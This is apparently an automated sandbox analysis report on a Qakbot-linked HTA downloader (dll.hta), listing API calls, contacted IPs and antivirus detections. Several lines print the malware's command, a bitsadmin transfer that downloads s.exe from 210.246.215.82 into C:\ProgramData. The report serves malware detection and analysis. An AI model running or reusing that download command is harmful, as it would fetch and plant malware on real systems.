GetDiskFreeSpaceExW April 3, 2024, 1:32 p.m.	total_number_of_free_bytes: 9935740928 free_bytes_available: 9935740928 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 3, 2024, 1:39 p.m.	show_type: 0 filepath_r: bitsadmin parameters: /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe filepath: bitsadmin	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 3, 2024, 1:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (2 events)

host	162.19.139.184
host	210.246.215.82

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

Lionic	Trojan.HTML.Qakbot.a!c
VIPRE	Generic.HTA.Qakbot.H.AF6D1379
Arcabit	Generic.HTA.Qakbot.H.AF6D1379
Symantec	CL.Downloader!gen92
ESET-NOD32	VBS/TrojanDownloader.Agent.ZKQ
Avast	VBS:Runner-NG [Trj]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	Generic.HTA.Qakbot.H.AF6D1379
MicroWorld-eScan	Generic.HTA.Qakbot.H.AF6D1379
Emsisoft	Generic.HTA.Qakbot.H.AF6D1379 (B)
FireEye	Generic.HTA.Qakbot.H.AF6D1379
Kingsoft	Win32.Infected.AutoInfector.a
ZoneAlarm	HEUR:Trojan-Downloader.Script.Generic
GData	Generic.HTA.Qakbot.H.AF6D1379
Tencent	Vbs.Trojan-Downloader.Der.Ocnw
MAX	malware (ai score=89)
Fortinet	VBS/Agent.VHJ!tr.dldr
AVG	VBS:Runner-NG [Trj]

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (1 event)

Time & API	Arguments	Status	Return	Repeated
CryptHashData April 3, 2024, 1:32 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x0000000000338530 flags: 0	1	1	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe
cmdline	bitsadmin /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe

dll.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All